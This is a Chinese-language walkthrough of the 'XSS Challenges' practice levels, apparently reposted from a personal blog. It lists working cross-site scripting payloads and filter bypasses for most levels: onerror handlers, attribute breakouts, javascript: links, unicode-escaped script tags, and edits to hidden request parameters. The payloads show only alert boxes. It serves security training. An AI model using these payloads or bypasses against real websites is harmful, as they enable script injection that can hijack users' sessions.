XSS Challenges

Posted zmqqq

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS Challenges相关的知识,希望对你有一定的参考价值。

1.

没有过滤

<img src=1 onerror=alert(document.domain)>

技术图片

2.

输入第一关的payload

查看源码

技术图片

"><img src=1 onerror=alert(document.domain)>

技术图片

3.

发现字符被转义

技术图片

抓包,发现有两个参数

技术图片

修改第二个参数

技术图片

4.

抓包发现有三个参数

技术图片

修改第三个参数

技术图片

发现还是没有弹窗,查看源码

技术图片

修改第三个参数

技术图片

5.

发现限制了输入框的长度

技术图片

查看元素,修改长度

技术图片

6.

技术图片

发现没有过滤引号,但是尖括号被html实体转义了

使用事件触发XSS

技术图片

7.

技术图片

没有引号,使用事件

技术图片

8.

技术图片

href 可以使用伪协议,然后点击

javascript:alert(document.domain)

10.

发现domain被过滤了

技术图片技术图片

11.

技术图片

过滤了事件

技术图片

<script>标签也不行

想到还可以使用javascript伪协议

技术图片

发现s还是有问题,于是先编码试试

"><a href=javascript:alert(document.domain)>1</a>

12.

去网上找了找大佬们写的,发现使用`,在IE下解析成引号

技术图片

15.

dom型

输入<img src=1 onerror=alert(1)>

发现过滤了<>输入在<script>标签中,使用编码

\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003ealert(document.domain)\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e

输入之后\都被过滤了

\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003ealert(document.domain)\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e

16.

\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003ealert(document.domain)\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e

以上是关于XSS Challenges的主要内容,如果未能解决你的问题,请参考以下文章

XSS Challenges

XSS Challenges

xss challenges平台学习

escape.alf.nu XSS Challenges 0-7 之一步步学XSS

XSS Challenges

XSS Challenges